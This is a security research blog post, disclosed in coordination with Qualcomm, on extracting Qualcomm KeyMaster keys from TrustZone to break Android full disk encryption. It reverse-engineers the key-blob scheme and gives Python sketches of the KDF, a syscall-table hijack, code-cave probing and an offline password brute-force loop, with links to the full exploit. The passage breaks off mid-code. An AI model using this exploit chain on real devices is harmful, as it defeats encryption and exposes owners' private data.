Bits, Please!

Extracting Qualcomm's KeyMaster Keys - Breaking Android Full Disk Encryption

2016-06-30T15:00:00.001+03:00

After covering a TrustZone kernel vulnerability and exploit in the previous blog post, I thought this time it might be interesting to explore some of the implications of code-execution within the TrustZone kernel. In this blog post, I'll demonstrate how TrustZone kernel code-execution can be used to effectively break Android's Full Disk Encryption (FDE) scheme. We'll also see some of the inherent issues stemming from the design of Android's FDE scheme, even without any TrustZone vulnerability.

I've been in contact with Qualcomm regarding the issue prior to the release of this post, and have let them review the blog post. As always, they've been very helpful and fast to respond. Unfortunately, it seems as though fixing the issue is not simple, and might require hardware changes.

If you aren't interested in the technical details and just want to read the conclusions - feel free to jump right to the "Conclusions" section. In the same vein, if you're only interested in the code, jump directly to the "Code" section.

[UPDATE: I've made a factual mistake in the original blog post, and have corrected it in the post below. Apparently Qualcomm are not able to sign firmware images; only OEMs can do so. As such, Qualcomm cannot be coerced to create a custom TrustZone image. I apologise for the mistake.]

And now without further ado, let's get to it!

Setting the Stage

A couple of months ago the highly-publicised case of Apple vs. FBI brought attention to the topic of privacy - especially in the context of mobile devices. Following the 2015 San Bernardino terrorist attack, the FBI seized a mobile phone belonging to the shooter, Syed Farook, with the intent to search it for any additional evidence or leads related to the ongoing investigation. However, despite being in possession of the device, the FBI were unable to unlock the phone and access its contents.

This may sound puzzling at first. "Surely if the FBI has access to the phone, could they not extract the user data stored on it using forensic tools?". Well, the answer is not that simple. You see, the device in question was an iPhone 5c, running iOS 9.

As you may well know, starting with iOS 8, Apple has automatically enabled Full Disk Encryption (FDE) using an encryption key which is derived from the user's password. In order to access the data on the device, the FBI would have to crack that encryption. Barring any errors in cryptographic design, this would most probably be achieved by cracking the user's password.

"So why not just brute-force the password?". That sounds like a completely valid approach - especially since most users are notoriously bad at choosing strong passwords, even more so when it comes to mobile devices.

However, the engineers at Apple were not oblivious to this concern when designing their FDE scheme. In order to try and mitigate this kind of attack, they've designed the encryption scheme so that the generated encryption key is bound to the hardware of the device.

In short, each device has an immutable 256-bit unique key called the UID, which is randomly generated and fused into the device's hardware at the factory. The key is stored in a way which completely prevents access to it using software or firmware (it can only be set as a key for the AES Engine), meaning that even Apple cannot extract it from the device once it's been set. This device-specific key is then combined with the user's password to generate the encryption key used to protect the data on the device. This effectively 'tangles' the password and the UID key.

Apple's FDE KDF

Binding the encryption key to the device's hardware allows Apple to make the job much harder for would-be attackers. It essentially forces attackers to use the device for each cracking attempt. This, in turn, allows Apple to introduce a whole array of defences that would make cracking attempts on the device unattractive.

For starters, the key-derivation function shown above is engineered so that it takes a substantial amount of time to compute on the device. Specifically, Apple chose the function's parameters so that a single key derivation takes approximately 80 milliseconds. This delay makes cracking short alphanumeric passwords slow (~2 weeks for a 4-character alphanumeric password), and cracking longer passwords completely infeasible.
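To sanity-check the ~2 week figure, here is a quick back-of-the-envelope calculation. It assumes (my assumption, not a statement from Apple) a 62-symbol alphabet of upper- and lower-case letters plus digits, an exhaustive search over every candidate, and exactly 80 ms per guess.

```python
import string

ALPHABET = string.ascii_letters + string.digits  # 62 symbols (assumed alphabet)
SECONDS_PER_GUESS = 0.080                         # ~80 ms per on-device key derivation


def exhaustive_search_days(length: int, alphabet: str = ALPHABET,
                           seconds_per_guess: float = SECONDS_PER_GUESS) -> float:
    """Worst-case time, in days, to try every password of `length` symbols."""
    candidates = len(alphabet) ** length
    return candidates * seconds_per_guess / 86_400


if __name__ == "__main__":
    for n in (4, 5, 6):
        print(f"{n} characters: {exhaustive_search_days(n):,.1f} days")
```

Under these assumptions four characters come out at roughly 13.7 days. A six-character password drawn only from lowercase letters and digits comes out at about 5.5 years.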

In order to further mitigate brute-force attacks on the device itself, Apple has also introduced an incrementally increasing delay between subsequent password guesses. On the iPhone 5c, this delay was enforced entirely in software. Lastly, Apple has allowed for an option to completely erase all of the information stored on the device after 10 failed password attempts. This configuration, coupled with the software-induced delays, made cracking the password on the device itself rather infeasible as well.

With this in mind, it's much easier to understand why the FBI were unable to crack the device's encryption.

Had they been able to extract the UID key, they could have used as much (specialized) hardware as needed in order to rapidly guess many passwords, which would most probably allow them to eventually guess the correct password. However, seeing as the UID key cannot be extracted by means of software or firmware, that option is ruled out.

As for cracking the password on the device, the software-induced delays between password attempts and the possibility of obliterating all the data on the device made that option rather unattractive. That is, unless they could bypass the software protections... However, this is where the story diverges from the topic of this blog post, so we'll leave it at that.

If you'd like to read more, you can check out Dan Guido's superb post about the technical aspects of Apple v. FBI, or Matthew Green's great overview on Apple's FDE, or better yet, the iOS Security Guide.

Going back to the issue at hand - we can see that Apple has cleverly designed their FDE scheme in order to make it very difficult to crack. Android, being the mature operating system that it is, was not one to lag behind. In fact, Android has also offered full disk encryption, which has been enabled by default since Android 5.0.

So how does Android's FDE scheme fare? Let's find out.

Android Full Disk Encryption

Starting with Android 5.0, Android devices automatically protect all of the user's information by enabling full disk encryption.

Android FDE is based on a Linux Kernel subsystem called dm-crypt, which is widely deployed and researched. Off the bat, this is already good news - dm-crypt has withstood the test of time, and as such seems like a great candidate for an FDE implementation. However, while the encryption scheme may be robust, the system is only as strong as the key being used to encrypt the information. Additionally, users tend to choose weaker passwords on mobile devices. This means the key derivation function is hugely important in this setting.

So how is the encryption key generated?

This process is described in great detail in the official documentation of Android FDE, and in even greater detail in Nikolay Elenkov's blog, "Android Explorations". In short, the device generates a randomly-chosen 128-bit master key (which we'll refer to as the Device Encryption Key - DEK) and a 128-bit randomly-chosen salt. The DEK is then protected using an elaborate key derivation scheme, which uses the user's provided unlock credentials (PIN/Password/Pattern) in order to derive a key which will ultimately encrypt the DEK. The encrypted DEK is then stored on the device, inside a special unencrypted structure called the "crypto footer".

The encrypted disk can then be decrypted by simply taking the user's provided credentials, passing them through the key derivation function, and using the resulting key to decrypt the stored DEK. Once the DEK is decrypted, it can be used to decrypt the user's information.

However, this is where it gets interesting! Just like Apple's FDE scheme, Android FDE seeks to prevent brute-force cracking attacks, both on the device and especially off of it.

Naturally, in order to prevent on-device cracking attacks, Android introduced delays between decryption attempts and an option to wipe the user's information after a number of consecutive failed decryption attempts (just like iOS). But what about preventing off-device brute-force attacks? Well, this is achieved by introducing a step in the key derivation scheme which binds the key to the device's hardware. This binding is performed using Android's Hardware-Backed Keystore - KeyMaster.

KeyMaster

The KeyMaster module is intended to ensure the protection of cryptographic keys generated by applications. In order to guarantee that this protection cannot be tampered with, the KeyMaster module runs in a Trusted Execution Environment (TEE), which is completely separate from the Android operating system. In keeping with the TrustZone terminology, we'll refer to the Android operating system as the "Non-Secure World", and to the TEE as the "Secure World".

Put simply, the KeyMaster module can be used to generate encryption keys, and to perform cryptographic operations on them, without ever revealing the keys to the Non-Secure World.

Once the keys are generated in the KeyMaster module, they are encrypted using a hardware-backed encryption key, and returned to the Non-Secure World. Whenever the Non-Secure World wishes to perform an operation using the generated keys, it must supply the encrypted "key blob" to the KeyMaster module. The KeyMaster module can then decrypt the stored key, use it to perform the wanted cryptographic operation, and finally return the result to the Non-Secure World.

Since the keys protecting the key blobs are never revealed to the Non-Secure World, every cryptographic operation that uses a key blob must be handled by the KeyMaster module, directly on the device itself.

With this in mind, let's see exactly how KeyMaster is used in Android's FDE scheme. We'll do so by taking a closer look at the hardware-bound key derivation function used in Android's FDE scheme. Here's a short schematic detailing the KDF (based on a similar schematic created by Nikolay Elenkov):

Android FDE's KDF

As you can see, in order to bind the KDF to the hardware of the device, an additional field is stored in the crypto footer - a KeyMaster-generated key blob. This key blob contains a KeyMaster-encrypted RSA-2048 private key, which is used to sign an intermediate key during the KDF - thus requiring the use of the KeyMaster module in order to produce the intermediate key used to decrypt the DEK in each decryption attempt.

Moreover, the crypto footer also contains an additional field that doesn't serve any direct purpose in the decryption process: the value returned from running scrypt on the final intermediate key (IK3). This value is referred to as the "scrypted_intermediate_key" (Scrypted IK in the diagram above). It is used to verify the validity of the supplied FDE password in case of errors during the decryption process. This is important since it allows Android to know when a given encryption key is valid but the disk itself is faulty. However, knowing this value still shouldn't help an attacker "reverse" it to retrieve IK3, so it can't be used to help attackers aiming to guess the password off the device.
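The KDF described above can be sketched with nothing but the Python standard library. This is a minimal sketch based on my reading of AOSP's cryptfs and Nikolay Elenkov's description, not Android's actual code. Four details are assumptions on my part: the scrypt parameters (N=2^15, r=2^3, p=2^1, which I believe are the cryptfs defaults, stored in the footer as log2 factors), the 0x00 || IK1 || zeros padding, scrypting only the first 16 bytes of IK3 for the footer, and `sign`, a stand-in for the KeyMaster raw RSA signing call. Decrypting the DEK itself (AES-128-CBC with the KEK and IV) is omitted, since the standard library has no AES.

```python
import hashlib
from typing import Callable, Tuple

RSA_KEY_SIZE_BYTES = 256          # RSA-2048 key held by KeyMaster
KEY_LEN, IV_LEN = 16, 16          # AES-128 key-encryption key and IV


def scrypt32(data: bytes, salt: bytes, n: int, r: int, p: int) -> bytes:
    """scrypt with a 32-byte output (16-byte key followed by 16-byte IV)."""
    # maxmem is raised because N=2**15, r=8 needs slightly more than
    # OpenSSL's default 32 MiB limit.
    return hashlib.scrypt(data, salt=salt, n=n, r=r, p=p,
                          maxmem=64 * 1024 * 1024, dklen=KEY_LEN + IV_LEN)


def fde_kdf(password: bytes, salt: bytes, sign: Callable[[bytes], bytes],
            n: int = 1 << 15, r: int = 1 << 3, p: int = 1 << 1
            ) -> Tuple[bytes, bytes, bytes]:
    """Return (kek, iv, scrypted_ik) for a candidate password.

    `sign` stands in for KeyMaster: a raw (unpadded) RSA signature made with
    the private key wrapped in the crypto footer's key blob.
    """
    ik1 = scrypt32(password, salt, n, r, p)
    # 0x00 || IK1 || zero padding up to the modulus size, so the message
    # (read as a big-endian integer) is always smaller than the modulus.
    to_sign = b"\x00" + ik1 + bytes(RSA_KEY_SIZE_BYTES - 1 - len(ik1))
    ik2 = sign(to_sign)                      # the hardware-bound step
    ik3 = scrypt32(ik2, salt, n, r, p)
    kek, iv = ik3[:KEY_LEN], ik3[KEY_LEN:]
    # Stored in the footer so Android can tell "wrong password" from "bad disk".
    scrypted_ik = scrypt32(kek, salt, n, r, p)
    return kek, iv, scrypted_ik
```

Everything except `sign` can be computed on any machine. Only the RSA signature ties the derivation to the device, and it does so only as long as the RSA private key stays inside KeyMaster.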

As we've seen, the Android FDE's KDF is "bound" to the hardware of the device by the intermediate KeyMaster signature. But how secure is the KeyMaster module? How are the key blobs protected? Unfortunately, this is hard to say. The implementation of the KeyMaster module is provided by the SoC OEMs and, as such, is completely undocumented (essentially a black-box). We could try and rely on the official Android documentation, which states that the KeyMaster module: "...offers an opportunity for Android devices to provide hardware-backed, strong security services...". But surely that's not enough.

So... Are you pondering what I'm pondering?

Reversing Qualcomm's KeyMaster

As we've seen in the previous blog posts, Qualcomm provides a Trusted Execution Environment called QSEE (Qualcomm Secure Execution Environment). QSEE allows small applications, called "Trustlets", to execute within the "Secure World" of TrustZone. One such QSEE trustlet running in the "Secure World" is the KeyMaster application. As we've already seen how to reverse-engineer QSEE trustlets, we can simply apply the same techniques in order to reverse engineer the KeyMaster module and gain some insight into its inner workings.

First, let's take a look at the Android source code which is used to interact with the KeyMaster application. Doing so reveals that the trustlet only supports four different commands:

As we're interested in the protections guarding the generated key blobs, let's take a look at the KEYMASTER_SIGN_DATA command. This command receives a previously encrypted key blob and somehow performs an operation using the encapsulated cryptographic key. Ergo, by reverse-engineering this function, we should be able to deduce how the encrypted key blobs are decapsulated by the KeyMaster module.

The command's signature is exactly as you'd imagine - the user provides an encrypted key blob, the signature parameters, and the address and length of the data to be signed. The trustlet then decapsulates the key, calculates the signature, and writes it into the shared result buffer.

As luck would have it, the key blob's structure is actually defined in the supplied header files. Here's what it looks like:
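As a hedged sketch, here is a Python parser for the layout as I recall it from Qualcomm's `keymaster_qcom.h` (`struct qcom_km_key_blob`). Treat the field order, the sizes and the magic value as assumptions, and check them against your copy of the header. Reassuringly, the layout adds up to 0x644 bytes, and everything except the final 32-byte HMAC comes to 0x624 bytes.

```python
import struct

KM_MAGIC_NUM = 0x4B4D4B42   # "KMKB"
KM_KEY_SIZE_MAX = 512       # room for up to a 4096-bit value
KM_IV_LENGTH = 16           # AES-128-CBC IV
KM_HMAC_LENGTH = 32         # SHA-256-sized HMAC

# Assumed packed, little-endian layout of struct qcom_km_key_blob.
KEY_BLOB_FMT = (f"<II{KM_KEY_SIZE_MAX}sI{KM_KEY_SIZE_MAX}sI"
                f"{KM_IV_LENGTH}s{KM_KEY_SIZE_MAX}sI{KM_HMAC_LENGTH}s")
FIELDS = ("magic_num", "version_num",
          "modulus", "modulus_size",
          "public_exponent", "public_exponent_size",
          "iv",
          "encrypted_private_exponent", "encrypted_private_exponent_size",
          "hmac")
KEY_BLOB_SIZE = struct.calcsize(KEY_BLOB_FMT)        # 0x644
HMAC_COVERED = KEY_BLOB_SIZE - KM_HMAC_LENGTH        # 0x624


def parse_key_blob(blob: bytes) -> dict:
    """Split a raw key blob into its fields, trimming arrays to their sizes."""
    if len(blob) < KEY_BLOB_SIZE:
        raise ValueError("key blob too short")
    fields = dict(zip(FIELDS, struct.unpack_from(KEY_BLOB_FMT, blob)))
    if fields["magic_num"] != KM_MAGIC_NUM:
        raise ValueError("bad key blob magic")
    for name in ("modulus", "public_exponent", "encrypted_private_exponent"):
        size = fields[name + "_size"]
        if size > KM_KEY_SIZE_MAX:
            raise ValueError(f"{name}_size out of range")
        fields[name] = fields[name][:size]
    return fields
```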

Okay! This is pretty interesting.

First, we can see that the key blob contains the unencrypted modulus and public exponent of the generated RSA key. However, the private exponent seems to be encrypted in some way. Not only that, but the whole key blob's authenticity is verified by using an HMAC. So where is the encryption key stored? Where is the HMAC key stored? We'll have to reverse-engineer the KeyMaster module to find out.

Let's take a look at the KeyMaster trustlet's implementation of the KEYMASTER_SIGN_DATA command. The function starts with some boilerplate validations in order to make sure the supplied parameters are valid. We'll skip those, since they aren't the focus of this post. After verifying all the parameters, the function maps-in the user-supplied data buffer, so that it will be accessible to the "Secure World". Eventually, we reach the "core" logic of the function:

Okay, we're definitely getting somewhere!

First of all, we can see that the code calls some function which I've taken the liberty of calling get_some_kind_of_buffer, and stores the results in the variables buffer_0 and buffer_1. Immediately after retrieving these buffers, the code calls the qsee_hmac function in order to calculate the HMAC of the first 0x624 bytes of the user-supplied key blob. This makes sense, since the size of the key blob structure we've seen before is exactly 0x624 bytes (without the HMAC field).

But wait! We've already seen the qsee_hmac function before - in the Widevine application. Specifically, we know it receives the following arguments:

The variable that we've called buffer_1 is passed in as the fourth argument to qsee_hmac. This can only mean one thing... It is in fact the HMAC key!
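The HMAC check at the start of KEYMASTER_SIGN_DATA can be modelled in a few lines. This sketch assumes HMAC-SHA256, which the 32-byte HMAC field suggests, although the actual algorithm is whatever the trustlet passes as the first argument of `qsee_hmac`. It takes the HMAC key (`buffer_1`) as a parameter. Anyone holding that key can verify, or forge, key blobs without the device.

```python
import hashlib
import hmac

HMAC_COVERED = 0x624   # bytes of the blob covered by the HMAC
HMAC_LEN = 32          # assumed HMAC-SHA256 tag size


def verify_key_blob(blob: bytes, hmac_key: bytes) -> bool:
    """Recompute and check a key blob's HMAC, as KEYMASTER_SIGN_DATA appears to."""
    if len(blob) < HMAC_COVERED + HMAC_LEN:
        return False
    expected = hmac.new(hmac_key, blob[:HMAC_COVERED], hashlib.sha256).digest()
    stored = blob[HMAC_COVERED:HMAC_COVERED + HMAC_LEN]
    return hmac.compare_digest(expected, stored)   # constant-time comparison
```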

What about buffer_0? We can already see that it is used in the function do_something_with_keyblob. Not only that, but immediately after calling that function, the signature is calculated and written to the destination buffer. However, as we've previously seen, the private exponent is encrypted in the key blob. Obviously the RSA signature cannot be calculated until the private exponent is decrypted... So what does do_something_with_keyblob do? Let's see:

Aha! Just as we suspected. The function do_something_with_keyblob simply decrypts the private exponent, using buffer_0 as the encryption key!

Finally, let's take a look at the function that was used to retrieve the HMAC and encryption keys (now bearing a more appropriate name):

As we can see in the code above, the HMAC key and the encryption key are both generated using some kind of key derivation function. Each key is generated by invoking the KDF using a pair of hard-coded strings as inputs. The resulting derived key is then stored in the KeyMaster application's global buffer, and the pointer to the key is returned to the caller. Moreover, if we are to trust the provided strings, the internal key derivation function uses an actual hardware key, called the SHK, which would no doubt be hard to extract using software...

...But this is all irrelevant! The decapsulation code we have just reverse-engineered has revealed a very important fact.

Instead of creating a scheme which directly uses the hardware key without ever divulging it to software or firmware, the code above performs the encryption and validation of the key blobs using keys which are directly available to the TrustZone software! Note that the keys are also constant - they are directly derived from the SHK (which is fused into the hardware) and from two "hard-coded" strings.
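To illustrate why constant, software-visible keys matter, here is a toy Python model of the derivation. The real QSEE KDF and its hard-coded strings are not reproduced here. HMAC-SHA256 stands in for the KDF, and the label strings are hypothetical placeholders. The model shows that with a fixed SHK and fixed strings, every "boot" derives identical keys, so dumping the global buffer once is enough.

```python
import hashlib
import hmac
import secrets


class ToyKeyMasterKeys:
    """Toy model of keys derived from a fused key plus constant strings.

    HMAC-SHA256 stands in for the real QSEE KDF, and the label strings are
    hypothetical placeholders, not the trustlet's actual hard-coded strings.
    """
    LABELS = {
        "hmac": (b"hypothetical-hmac-label", b"hypothetical-hmac-context"),
        "enc": (b"hypothetical-enc-label", b"hypothetical-enc-context"),
    }

    def __init__(self, shk: bytes):
        self._shk = shk      # models the SHK fused into the SoC
        self._cache = {}     # models the trustlet's global key buffer

    def get(self, which: str) -> bytes:
        if which not in self._cache:
            label, context = self.LABELS[which]
            self._cache[which] = hmac.new(self._shk, label + b"\x00" + context,
                                          hashlib.sha256).digest()
        return self._cache[which]


shk = secrets.token_bytes(32)                  # fixed once, at the factory
boot_1, boot_2 = ToyKeyMasterKeys(shk), ToyKeyMasterKeys(shk)
print(boot_1.get("hmac") == boot_2.get("hmac"))  # True: same keys on every boot
```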

Let's take a moment to explore some of the implications of this finding.

Conclusions

The key derivation is not hardware bound. Instead of using a real hardware key which cannot be extracted by software (for example, the SHK), the KeyMaster application uses a key derived from the SHK and directly available to TrustZone.
OEMs can comply with law enforcement to break Full Disk Encryption. Since the key is available to TrustZone, OEMs could simply create and sign a TrustZone image which extracts the KeyMaster keys and flash it to the target device. This would allow law enforcement to easily brute-force the FDE password off the device using the leaked keys.
Patching TrustZone vulnerabilities does not necessarily protect you from this issue. Even on patched devices, if an attacker can obtain the encrypted disk image (e.g. by using forensic tools), they can then "downgrade" the device to a vulnerable version, extract the keys by exploiting TrustZone, and use them to brute-force the encryption. Since the keys are derived directly from the SHK, and the SHK cannot be modified, this renders all down-gradable devices directly vulnerable.
Android FDE is only as strong as the TrustZone kernel or KeyMaster. Finding a TrustZone kernel vulnerability or a vulnerability in the KeyMaster trustlet directly leads to the disclosure of the KeyMaster keys, thus enabling off-device attacks on Android FDE.

During my communication with Qualcomm I voiced concerns about the usage of a software-accessible key derived from the SHK. I suggested using the SHK (or another hardware key) directly. As far as I know, the SHK cannot be extracted from software, and is only available to the cryptographic processors (similarly to Apple's UID). Therefore, using it would thwart any attempt at off-device brute force attacks (barring the use of specialized hardware to extract the key).

However, reality is not that simple. The SHK is used for many different purposes. Allowing the user to directly encrypt data using the SHK would compromise those use-cases. Not only that, but the KeyMaster application is widely used in the Android operating-system. Modifying its behaviour could "break" applications which rely on it. Lastly, the current design of the KeyMaster application doesn't differentiate between requests which use the KeyMaster application for Android FDE and other requests for different use-cases. This makes it harder to incorporate a fix which only modifies the KeyMaster application.

Regardless, I believe this issue underscores the need for a solution that entangles the full disk encryption key with the device's hardware in a way which cannot be bypassed using software. Perhaps that means redesigning the FDE's KDF. Perhaps this can be addressed using additional hardware. I think this is something Google and OEMs should definitely get together and think about.

Extracting the KeyMaster Keys

Now that we've set our sights on the KeyMaster keys, we are still left with the challenge of extracting the keys directly from TrustZone.

Previously, in the zero-to-TrustZone series of blog posts, we discovered an exploit which allowed us to achieve code-execution within QSEE, namely, within the Widevine DRM application. However, is that enough?

Perhaps we could read the keys directly from the KeyMaster trustlet's memory from the context of the hijacked Widevine trustlet? Unfortunately, the answer is no. Any attempt to access a different QSEE application's memory causes an XPU violation, and subsequently crashes the violating trustlet (even when switching to a kernel context). What about calling the same KDF used by the KeyMaster module to generate the keys from the context of the Widevine trustlet? Unfortunately the answer is no once again. The KDF is only present in the KeyMaster application's code segment, and QSEE applications cannot modify their own code or allocate new executable pages.

Luckily, we've also previously discovered an additional privilege escalation from QSEE to the TrustZone kernel. Surely code execution within the TrustZone kernel would allow us to hijack any QSEE application! Then, once we control the KeyMaster application, we can simply use it to leak the HMAC and encryption keys and call it a day.

Recall that in the previous blog post we reverse-engineered the mechanism behind the invocation of system calls in the TrustZone kernel. Doing so revealed that most system-calls are invoked indirectly by using a set of globally-stored pointers, each of which points to a different table of supported system-calls. Each system-call table simply contains a bunch of consecutive 64-bit entries: a 32-bit value representing the syscall number, followed by a 32-bit pointer to the syscall handler function itself. Here is one such table:
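Given a dump of such a table, walking it is straightforward. Here is a minimal Python sketch. It assumes little-endian 32-bit words and that the caller already knows where the table ends, since no particular terminator is assumed. A handler pointer with bit 0 set most likely points at Thumb code, so clear that bit before disassembling.

```python
import struct
from typing import Iterator, Tuple


def parse_syscall_table(raw: bytes, base: int = 0) -> Iterator[Tuple[int, int, int]]:
    """Yield (entry_address, syscall_number, handler_pointer) per 8-byte entry.

    Assumes little-endian 32-bit words; any trailing partial entry is ignored.
    """
    usable = len(raw) - len(raw) % 8
    for index, (number, handler) in enumerate(struct.iter_unpack("<II", raw[:usable])):
        yield base + 8 * index, number, handler
```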

Since these tables are used by all QSEE trustlets, they could serve as a highly convenient entry point in order to hijack the code execution within the KeyMaster application!

All we would need to do is to overwrite a system-call handler entry in the table, and point it to a function of our own. Then, once the KeyMaster application invokes the target system-call, it would execute our own handler instead of the original one! As a nice added bonus, this also means we don't have to worry about restoring execution after our code runs.
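Hijacking an entry then amounts to a single 32-bit write. In this sketch a `bytearray` stands in for the table in TrustZone kernel memory. The real write goes through the kernel exploit, which isn't modelled here. The old pointer is returned so the entry can be restored afterwards. The table contents and the stub address below are made up. If the stub is Thumb code, its pointer presumably needs bit 0 set, assuming the dispatcher calls handlers with an interworking branch such as BLX.

```python
import struct


def hijack_syscall(table: bytearray, syscall_number: int, new_handler: int) -> int:
    """Overwrite the handler for `syscall_number`; return the previous pointer."""
    for offset in range(0, len(table) - len(table) % 8, 8):
        number, old_handler = struct.unpack_from("<II", table, offset)
        if number == syscall_number:
            struct.pack_into("<I", table, offset + 4, new_handler)
            return old_handler
    raise KeyError(f"syscall {syscall_number:#x} not found in table")


# Synthetic table and hypothetical code-cave address (Thumb bit set).
table = bytearray(struct.pack("<IIII", 0x11, 0xFE80A001, 0x12, 0xFE80B001))
saved = hijack_syscall(table, 0x12, 0xFE806100 | 1)
```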

But there's a tiny snag - in order to direct the handler at a function of our own, we need some way to allocate a chunk of code which will be globally available in the "Secure World". This is because, as mentioned above, different QSEE applications cannot access each other's memory segments. This renders our previous method of overwriting the code segments of the Widevine application useless in this case. However, as we've seen in the past, the TrustZone Kernel's code segments (which are accessible to all QSEE applications when executing in kernel context) are protected using a special hardware component called an XPU. Therefore, even when running within the TrustZone kernel and disabling access protection faults in the ARM MMU, we are still unable to modify them.

This is where some brute-force comes in handy... I've written a small snippet of code that quickly iterates over all of the TrustZone Kernel's code segments, and attempts to modify them. If there is any (mistakenly?) XPU-unprotected region, we will surely find it. Indeed, after iterating through the code segments, one rather large segment, ranging from addresses 0xFE806000 to 0xFE810000, appeared to be unprotected!
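The probing loop can be sketched as follows. This is a simulation, not the original snippet. The real code runs inside TrustZone, and how it survives a write to an XPU-protected page isn't described above, so here a rejected write is modelled as a `PermissionError` raised by a hypothetical `write32` callback. Probing one word per page is my simplification. Each probe flips every bit of a word, checks the read-back, and restores the original value.

```python
from typing import Callable, Dict, List, Tuple


def find_writable_pages(read32: Callable[[int], int],
                        write32: Callable[[int, int], None],
                        start: int, end: int, page_size: int = 0x1000) -> List[int]:
    """Probe one word per page; return pages whose write actually sticks."""
    writable = []
    for addr in range(start, end, page_size):
        original = read32(addr)
        probe = original ^ 0xFFFFFFFF          # always differs from original
        try:
            write32(addr, probe)
        except PermissionError:                # models an XPU violation
            continue
        if read32(addr) == probe:
            writable.append(addr)
            write32(addr, original)            # put the original word back
    return writable


class SimulatedMemory:
    """Hypothetical stand-in for TrustZone memory with XPU-protected ranges."""

    def __init__(self, unprotected: List[Tuple[int, int]]):
        self.words: Dict[int, int] = {}
        self.unprotected = unprotected

    def read32(self, addr: int) -> int:
        return self.words.get(addr, 0)

    def write32(self, addr: int, value: int) -> None:
        if not any(lo <= addr < hi for lo, hi in self.unprotected):
            raise PermissionError(f"XPU violation at {addr:#x}")
        self.words[addr] = value & 0xFFFFFFFF


mem = SimulatedMemory([(0xFE806000, 0xFE810000)])
pages = find_writable_pages(mem.read32, mem.write32, 0xFE800000, 0xFE820000)
print(f"{pages[0]:#x}-{pages[-1] + 0x1000:#x}")   # 0xfe806000-0xfe810000
```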

Since we don't want to disrupt the regular operation of the TrustZone kernel, it would be wise to find a small code-cave in that region, or a small chunk of code that would be harmless to overwrite. Searching around for a bit reveals a small bunch of logging strings in the segment - surely we can overwrite them without any adverse effects:
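Locating such strings is easy to automate. This Python sketch scans a dumped segment for runs of NUL-terminated printable strings and reports candidate caves, aligned up to a 4-byte boundary. The minimum length and the alignment are my own choices, not requirements of the exploit.

```python
import re
from typing import List, Tuple

# One or more NUL-terminated runs of printable ASCII (plus tab/newline).
_STRING_RUN = re.compile(rb"(?:[\x20-\x7e\t\n]+\x00)+")


def find_string_caves(segment: bytes, base: int, min_len: int = 64,
                      align: int = 4) -> List[Tuple[int, int]]:
    """Return (aligned_address, usable_length) for long runs of strings."""
    caves = []
    for match in _STRING_RUN.finditer(segment):
        start = base + match.start()
        aligned = (start + align - 1) & ~(align - 1)
        usable = match.end() - match.start() - (aligned - start)
        if usable >= min_len:
            caves.append((aligned, usable))
    return caves
```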

Now that we have a modifiable code cave in the TrustZone kernel, we can proceed to write a small stub that, when called, will exfiltrate the KeyMaster keys directly from the KeyMaster trustlet's memory!

Lastly, we need a simple way to cause the KeyMaster application to execute the hijacked system-call. Remember, we can easily send commands to the KeyMaster application which, in turn, will cause the KeyMaster application to call quite a few system-calls. Reviewing the KeyMaster's key-generation command reveals that one good candidate to hijack would be the "qsee_hmac" system-call:

KeyMaster's "Generate Key" Flow

Where qsee_hmac's signature is:

This is a good candidate for a few reasons:

The "data" argument that's passed in is a buffer that's shared with the non-secure world. This means whatever we write to it can easily be retrieved after returning from the "Secure World".
The qsee_hmac function is not called very often, so hijacking it for a couple of seconds would probably be harmless.
The function receives the address of the HMAC key as one of the arguments. This saves us the need to find the KeyMaster application's address dynamically and calculate the addresses of the keys in memory.

Finally, all our shellcode would have to do is to read the HMAC and encryption keys from the KeyMaster application's global buffer (at the locations we saw earlier on), and "leak" them into the shared buffer. After returning from the command request, we could then simply fish out the leaked keys from the shared buffer. Here's a small snippet of THUMB assembly that does just that:

Shellcode which leaks KeyMaster Keys

Putting it all together

Finally, we have all the pieces of the puzzle. All we need to do in order to extract the KeyMaster keys is to:

Set the DACR in the TrustZone kernel to disable MMU access-permission checks, allowing us to modify the code cave.
Write a small shellcode stub in the code cave which reads the keys from the KeyMaster application.
Hijack the "qsee_hmac" system-call and point it at our shellcode stub.
Call the KeyMaster's key-generation command, causing it to trigger the poisoned system-call and exfiltrate the keys into the shared buffer.
Read the leaked keys from the shared buffer.

Here's a diagram detailing all of these steps:

The Code

Finally, as always, I've provided the full source code for the attack described above. The code builds upon the two previously disclosed issues in the zero-to-TrustZone series, and allows you to leak the KeyMaster keys directly from your device! After successfully executing the exploit, the KeyMaster keys should be printed to the console, like so:

You can find the full source code of the exploit here:

https://github.com/laginimaineb/ExtractKeyMaster

I've also written a set of python scripts which can be used to brute-force Android full disk encryption off the device. You can find the scripts here:

https://github.com/laginimaineb/android_fde_bruteforce

Simply invoke the python script fde_bruteforce.py using:

The crypto footer from the device
The leaked KeyMaster keys
The word-list containing possible passwords

Currently, the script simply enumerates each password from a given word-list, and attempts to match the encryption result with the "scrypted intermediate key" stored in the crypto footer. That is, it passes each word in the word-list through the Android FDE KDF, scrypts the result, and compares it to the value stored in the crypto footer. Since the implementation is fully in python, it is rather slow... However, those seeking speed could port it to a much faster platform, such as hashcat/oclHashcat.
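The core of such a loop can be sketched as follows. This is not the code from the repository above. It is a minimal self-contained version with these assumptions: the RSA modulus and private exponent have already been recovered by decrypting the footer's key blob with the leaked keys (not shown), signatures are raw big-endian RSA, and the scrypt parameters are the defaults I believe cryptfs uses. As far as I can tell from cryptfs, only the first 16 bytes of IK3 are scrypted into the footer. Small scrypt parameters can be passed in for testing.

```python
import hashlib
import hmac
from typing import Callable, Iterable, Optional

SIG_LEN = 256   # RSA-2048


def scrypt32(data: bytes, salt: bytes, n: int, r: int, p: int) -> bytes:
    return hashlib.scrypt(data, salt=salt, n=n, r=r, p=p,
                          maxmem=64 * 1024 * 1024, dklen=32)


def offline_signer(modulus: int, private_exponent: int) -> Callable[[bytes], bytes]:
    """Raw RSA signing off the device, once the private exponent is known."""
    def sign(message: bytes) -> bytes:
        m = int.from_bytes(message, "big")
        if m >= modulus:
            raise ValueError("message not smaller than modulus")
        return pow(m, private_exponent, modulus).to_bytes(SIG_LEN, "big")
    return sign


def scrypted_ik(password: bytes, salt: bytes, sign: Callable[[bytes], bytes],
                n: int, r: int, p: int) -> bytes:
    ik1 = scrypt32(password, salt, n, r, p)
    ik2 = sign(b"\x00" + ik1 + bytes(SIG_LEN - 1 - len(ik1)))
    ik3 = scrypt32(ik2, salt, n, r, p)
    return scrypt32(ik3[:16], salt, n, r, p)   # the value the footer stores


def brute_force(words: Iterable[bytes], salt: bytes, target: bytes,
                sign: Callable[[bytes], bytes],
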